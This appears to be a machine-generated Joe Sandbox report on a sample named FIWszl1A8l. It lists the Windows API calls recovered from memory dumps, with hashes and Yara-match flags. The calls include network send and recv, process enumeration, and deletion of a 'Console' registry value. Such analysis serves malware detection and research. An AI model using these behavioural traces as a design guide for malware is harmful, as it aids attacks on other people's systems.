                                                                                                  • __lock.LIBCMT ref: 02D148C1
                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 02D148DE
                                                                                                  • _free.LIBCMT ref: 02D148F1
                                                                                                  • InterlockedIncrement.KERNEL32(032C1648), ref: 02D14909
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                   • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 3470314060-0
                                                                                                  • Opcode ID: 774c6439d22a8b84ec12526f716ccf2ef140f8b9db6799b72216c3bf3beedee2
                                                                                                  • Instruction ID: d2623227e43f48e2b3d09e7bbbd364ca58d1187730575049b12e86f1e90933df
                                                                                                  • Opcode Fuzzy Hash: 774c6439d22a8b84ec12526f716ccf2ef140f8b9db6799b72216c3bf3beedee2
                                                                                                  • Instruction Fuzzy Hash: D201A932D417E2BBEB20AB68B008799B3A1FF04B21F254405E854A7B80CB30AC55CFE1
                                                                                                  APIs
                                                                                                  • __getptd.LIBCMT ref: 0097D9CA
                                                                                                    • Part of subcall function 0097990F: __getptd_noexit.LIBCMT ref: 00979912
                                                                                                    • Part of subcall function 0097990F: __amsg_exit.LIBCMT ref: 0097991F
                                                                                                  • __amsg_exit.LIBCMT ref: 0097D9EA
                                                                                                  • __lock.LIBCMT ref: 0097D9FA
                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0097DA17
                                                                                                  • _free.LIBCMT ref: 0097DA2A
                                                                                                  • InterlockedIncrement.KERNEL32(027D1648), ref: 0097DA42
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                   • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                   • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                   • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                   • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                   • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 3470314060-0
                                                                                                  • Opcode ID: 8b8fba2d8462a9365bcc3682ed776ff08e18f9fc164d6493637d1715f8af427e
                                                                                                  • Instruction ID: 2450734b867a13a13c110d2af12d8c6a349ea2e1bd4c6b3f8bf879536c49543d
                                                                                                  • Opcode Fuzzy Hash: 8b8fba2d8462a9365bcc3682ed776ff08e18f9fc164d6493637d1715f8af427e
                                                                                                  • Instruction Fuzzy Hash: 1B01C03391BA219BC724AF68940676DB3B4BF40710F188119F81DB7380CB34A941DBD5
                                                                                                  APIs
                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 009748E1
                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 009748EC
                                                                                                  • Sleep.KERNEL32(00000258,?,E484B528,?,?,?), ref: 009748F9
                                                                                                  • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 00974914
                                                                                                  • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 0097491D
                                                                                                  • Sleep.KERNEL32(0000012C,?,E484B528,?,?,?), ref: 0097492E
                                                                                                    • Part of subcall function 00973F60: GetCurrentThreadId.KERNEL32 ref: 00973F65
                                                                                                    • Part of subcall function 00973F60: send.WS2_32(?,00987440,00000010,00000000), ref: 00973FC6
                                                                                                    • Part of subcall function 00973F60: SetEvent.KERNEL32(?), ref: 00973FE9
                                                                                                    • Part of subcall function 00973F60: InterlockedExchange.KERNEL32(?,00000000), ref: 00973FF5
                                                                                                    • Part of subcall function 00973F60: WSACloseEvent.WS2_32(?), ref: 00974003
                                                                                                    • Part of subcall function 00973F60: shutdown.WS2_32(?,00000001), ref: 0097401B
                                                                                                    • Part of subcall function 00973F60: closesocket.WS2_32(?), ref: 00974025
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                   • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                   • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                   • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                   • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                   • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Close$EventHandleObjectSingleSleepWait$CurrentExchangeInterlockedThreadclosesocketsendshutdown
                                                                                                  • String ID:
                                                                                                  • API String ID: 1019945655-0
                                                                                                  • Opcode ID: 9d8722712c6eba4b0af73b6554568a8cd8c4268c02056c41e2cd1ab7d302dcd1
                                                                                                  • Instruction ID: 91767d40d874ba6aa43789f4456955e209aff0741d90bde10dbd23712f9782cf
                                                                                                  • Opcode Fuzzy Hash: 9d8722712c6eba4b0af73b6554568a8cd8c4268c02056c41e2cd1ab7d302dcd1
                                                                                                  • Instruction Fuzzy Hash: C6F036762046049BC614EB69DC84D8BF3E9EFC5720B158B09F26D97794CA74EC059BA0
                                                                                                  APIs
                                                                                                  • DeleteObject.GDI32(?), ref: 02D09BD2
                                                                                                  • EnterCriticalSection.KERNEL32(02D2FB64,?,?,?,02D09B7B), ref: 02D09BE3
                                                                                                  • EnterCriticalSection.KERNEL32(02D2FB64,?,?,?,02D09B7B), ref: 02D09BF8
                                                                                                  • GdiplusShutdown.GDIPLUS(00000000,?,?,?,02D09B7B), ref: 02D09C04
                                                                                                  • LeaveCriticalSection.KERNEL32(02D2FB64,?,?,?,02D09B7B), ref: 02D09C15
                                                                                                  • LeaveCriticalSection.KERNEL32(02D2FB64,?,?,?,02D09B7B), ref: 02D09C1C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                   • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$EnterLeave$DeleteGdiplusObjectShutdown
                                                                                                  • String ID:
                                                                                                  • API String ID: 4268643673-0
                                                                                                  • Opcode ID: e6a0394b44a35eebdf0b4c332fd80b19040f46a1e6b9080a75b93617536fccd4
                                                                                                  • Instruction ID: 4dfc911ac006a12fe01a40bdb7020e710f0a1728260c353b6ae67ac4f28f0cbe
                                                                                                  • Opcode Fuzzy Hash: e6a0394b44a35eebdf0b4c332fd80b19040f46a1e6b9080a75b93617536fccd4
                                                                                                  • Instruction Fuzzy Hash: 600148B1D40310EF97249F6AA9D4415BBB4BF6871936189AEE4098A342C332CC1BCB94
                                                                                                  APIs
                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02D048E1
                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02D048EC
                                                                                                  • Sleep.KERNEL32(00000258), ref: 02D048F9
                                                                                                  • CloseHandle.KERNEL32(?), ref: 02D04914
                                                                                                  • CloseHandle.KERNEL32(?), ref: 02D0491D
                                                                                                  • Sleep.KERNEL32(0000012C), ref: 02D0492E
                                                                                                    • Part of subcall function 02D03F60: GetCurrentThreadId.KERNEL32 ref: 02D03F65
                                                                                                    • Part of subcall function 02D03F60: send.WS2_32(?,02D249C0,00000010,00000000), ref: 02D03FC6
                                                                                                    • Part of subcall function 02D03F60: SetEvent.KERNEL32(?), ref: 02D03FE9
                                                                                                    • Part of subcall function 02D03F60: InterlockedExchange.KERNEL32(?,00000000), ref: 02D03FF5
                                                                                                    • Part of subcall function 02D03F60: WSACloseEvent.WS2_32(?), ref: 02D04003
                                                                                                    • Part of subcall function 02D03F60: shutdown.WS2_32(?,00000001), ref: 02D0401B
                                                                                                    • Part of subcall function 02D03F60: closesocket.WS2_32(?), ref: 02D04025
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                   • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Close$EventHandleObjectSingleSleepWait$CurrentExchangeInterlockedThreadclosesocketsendshutdown
                                                                                                  • String ID:
                                                                                                  • API String ID: 1019945655-0
                                                                                                  • Opcode ID: fab7b87ca8abb7daf3fe870f31beaf9cfe39be2e3a66ebde96d19ec1834aca48
                                                                                                  • Instruction ID: 95d8515c6655023586a6bf22037e0e46b1aab31617badb82e55a429d49af908e
                                                                                                  • Opcode Fuzzy Hash: fab7b87ca8abb7daf3fe870f31beaf9cfe39be2e3a66ebde96d19ec1834aca48
                                                                                                  • Instruction Fuzzy Hash: E5F090362046045BC320EBA9DC84D4AF3E9EFD8720B218B09F265833D0CA71EC01CBA0
                                                                                                  APIs
                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02D03311
                                                                                                  • Sleep.KERNEL32(00000258), ref: 02D0331E
                                                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 02D03326
                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02D03332
                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02D0333A
                                                                                                  • Sleep.KERNEL32(0000012C), ref: 02D0334B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                   • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ObjectSingleWait$Sleep$ExchangeInterlocked
                                                                                                  • String ID:
                                                                                                  • API String ID: 3137405945-0
                                                                                                  • Opcode ID: 7c94f639f8ed72d3b29e306cb0c26e29521fe8415cbf1c39bac4a451f80fbead
                                                                                                  • Instruction ID: 4a66a08041140acb8df1f8b02dede06a0994388121265b186c2c48cf1277aee1
                                                                                                  • Opcode Fuzzy Hash: 7c94f639f8ed72d3b29e306cb0c26e29521fe8415cbf1c39bac4a451f80fbead
                                                                                                  • Instruction Fuzzy Hash: 79F082722443146BD7209BA9DC84D46F3E8AF99334B214B09F221833D0CAB1EC05CB60
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset$_vswprintf_s
                                                                                                  • String ID: D
                                                                                                  • API String ID: 3424173483-2746444292
                                                                                                  • Opcode ID: 2f372f8b193b55f381ae2940e49f38bf8b0d2135d2ee914d7ca5118c505ab299
                                                                                                  • Instruction ID: b126a18c089ed38ce0e9b772dc16b5794f9ccfd763f19e3aa7f827bbe8ee288e
                                                                                                  • Opcode Fuzzy Hash: 2f372f8b193b55f381ae2940e49f38bf8b0d2135d2ee914d7ca5118c505ab299
                                                                                                  • Instruction Fuzzy Hash: CA81F7759402287BEB21DB658C89FEBB77CEF99700F500098F709A6181DBB05B858F68
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset$_vswprintf_s
                                                                                                  • String ID: D
                                                                                                  • API String ID: 3424173483-2746444292
                                                                                                  • Opcode ID: 2f372f8b193b55f381ae2940e49f38bf8b0d2135d2ee914d7ca5118c505ab299
                                                                                                  • Instruction ID: c70504e64c048d25bef9b601619478dbc4d3c6ca131e238ff4c3d70ddc57c341
                                                                                                  • Opcode Fuzzy Hash: 2f372f8b193b55f381ae2940e49f38bf8b0d2135d2ee914d7ca5118c505ab299
                                                                                                  • Instruction Fuzzy Hash: 2F81C9B5940318BBE721DB658C89FEB77BCEF99701F504098F709A6180DBB05B858F64
                                                                                                  APIs
                                                                                                  • ___BuildCatchObject.LIBCMT ref: 02D2096E
                                                                                                    • Part of subcall function 02D208C9: ___BuildCatchObjectHelper.LIBCMT ref: 02D208FF
                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 02D20985
                                                                                                  • ___FrameUnwindToState.LIBCMT ref: 02D20993
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                   • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                  • String ID: csm$csm
                                                                                                  • API String ID: 2163707966-3733052814
                                                                                                  • Opcode ID: a4ec08a577bcb042cc7356b16b645f83b0b4d35d15726398ffe3570c0dbe416a
                                                                                                  • Instruction ID: f232811d6bd8ecdac7ed3076cab190dacc2aee2a5b88ca8b8d07a0e0c5d59d0a
                                                                                                  • Opcode Fuzzy Hash: a4ec08a577bcb042cc7356b16b645f83b0b4d35d15726398ffe3570c0dbe416a
                                                                                                  • Instruction Fuzzy Hash: 3C012F71001229BBEF12AF51CC44EAABF6AEF28399F048010BC4924660D732DDB5DBA0
                                                                                                  APIs
                                                                                                  • ___BuildCatchObject.LIBCMT ref: 00983A63
                                                                                                    • Part of subcall function 009839BE: ___BuildCatchObjectHelper.LIBCMT ref: 009839F4
                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 00983A7A
                                                                                                  • ___FrameUnwindToState.LIBCMT ref: 00983A88
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                  • String ID: csm$csm
                                                                                                  • API String ID: 2163707966-3733052814
                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002), ref: 02D0B800
                                                                                                  • RegDeleteValueW.ADVAPI32(?,IpDatespecial), ref: 02D0B810
                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 02D0B81B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseDeleteOpenValue
                                                                                                  • String ID: Console$IpDatespecial
                                                                                                  • API String ID: 849931509-1840232981
                                                                                                  APIs
                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,7A8163DF), ref: 02D0B9DA
                                                                                                  • _memset.LIBCMT ref: 02D0B9FB
                                                                                                  • _memset.LIBCMT ref: 02D0BA4B
                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 02D0BA65
                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 02D0BAB7
                                                                                                    • Part of subcall function 02D0F707: _malloc.LIBCMT ref: 02D0F721
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Process32_memset$CreateFirstNextSnapshotToolhelp32_malloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 2416807333-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$_malloc_memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 2102557794-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$_malloc_memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 2102557794-0
                                                                                                  APIs
                                                                                                  • recv.WS2_32(?,?,00000598,00000000), ref: 02D03CBF
                                                                                                  • SetLastError.KERNEL32(00000000,?,?,02D0399F,?,?,00000000,000000FF,00000000), ref: 02D03CFA
                                                                                                  • GetLastError.KERNEL32(00000000), ref: 02D03D45
                                                                                                  • WSAGetLastError.WS2_32(?,?,02D0399F,?,?,00000000,000000FF,00000000), ref: 02D03D7B
                                                                                                  • WSASetLastError.WS2_32(0000000D,?,?,02D0399F,?,?,00000000,000000FF,00000000), ref: 02D03DA2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$recv
                                                                                                  • String ID:
                                                                                                  • API String ID: 316788870-0
                                                                                                  APIs
                                                                                                  • recv.WS2_32(?,?,00000598,00000000), ref: 00973CBF
                                                                                                  • SetLastError.KERNEL32(00000000,?,?,0097399F,?,?,00000000,000000FF,00000000), ref: 00973CFA
                                                                                                  • GetLastError.KERNEL32(00000000), ref: 00973D45
                                                                                                  • WSAGetLastError.WS2_32(?,?,0097399F,?,?,00000000,000000FF,00000000), ref: 00973D7B
                                                                                                  • WSASetLastError.WS2_32(0000000D,?,?,0097399F,?,?,00000000,000000FF,00000000), ref: 00973DA2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$recv
                                                                                                  • String ID:
                                                                                                  • API String ID: 316788870-0
                                                                                                  APIs
                                                                                                  • _malloc.LIBCMT ref: 02D10EF9
                                                                                                    • Part of subcall function 02D0F673: __FF_MSGBANNER.LIBCMT ref: 02D0F68C
                                                                                                    • Part of subcall function 02D0F673: __NMSG_WRITE.LIBCMT ref: 02D0F693
                                                                                                    • Part of subcall function 02D0F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,02D14500,00000000,00000001,00000000,?,02D18DE6,00000018,02D26448,0000000C,02D18E76), ref: 02D0F6B8
                                                                                                  • _free.LIBCMT ref: 02D10F0C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap_free_malloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 1020059152-0
                                                                                                  APIs
                                                                                                  • _malloc.LIBCMT ref: 0097E5E5
                                                                                                    • Part of subcall function 00976E83: __FF_MSGBANNER.LIBCMT ref: 00976E9C
                                                                                                    • Part of subcall function 00976E83: __NMSG_WRITE.LIBCMT ref: 00976EA3
                                                                                                    • Part of subcall function 00976E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00979FB0,00000000,00000001,00000000,?,0097C0CF,00000018,00987C70,0000000C,0097C15F), ref: 00976EC8
                                                                                                  • _free.LIBCMT ref: 0097E5F8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap_free_malloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 1020059152-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3782668054.0000000000920000.00000040.00001000.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_920000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 955811338-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 955811338-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 955811338-0
                                                                                                  APIs
                                                                                                  • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 02D02C3F
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 02D02C55
                                                                                                  • TranslateMessage.USER32(?), ref: 02D02C64
                                                                                                  • DispatchMessageW.USER32(?), ref: 02D02C6A
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 02D02C78
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Message$Peek$DispatchMultipleObjectsTranslateWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 2015114452-0
                                                                                                  APIs
                                                                                                  • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00972BFF
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00972C15
                                                                                                  • TranslateMessage.USER32(?), ref: 00972C24
                                                                                                  • DispatchMessageW.USER32(?), ref: 00972C2A
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00972C38
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Message$Peek$DispatchMultipleObjectsTranslateWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 2015114452-0
                                                                                                  APIs
                                                                                                  • __CreateFrameInfo.LIBCMT ref: 009336A2
                                                                                                    • Part of subcall function 00933232: __getptd.LIBCMT ref: 00933240
                                                                                                    • Part of subcall function 00933232: __getptd.LIBCMT ref: 0093324E
                                                                                                  • __getptd.LIBCMT ref: 009336AC
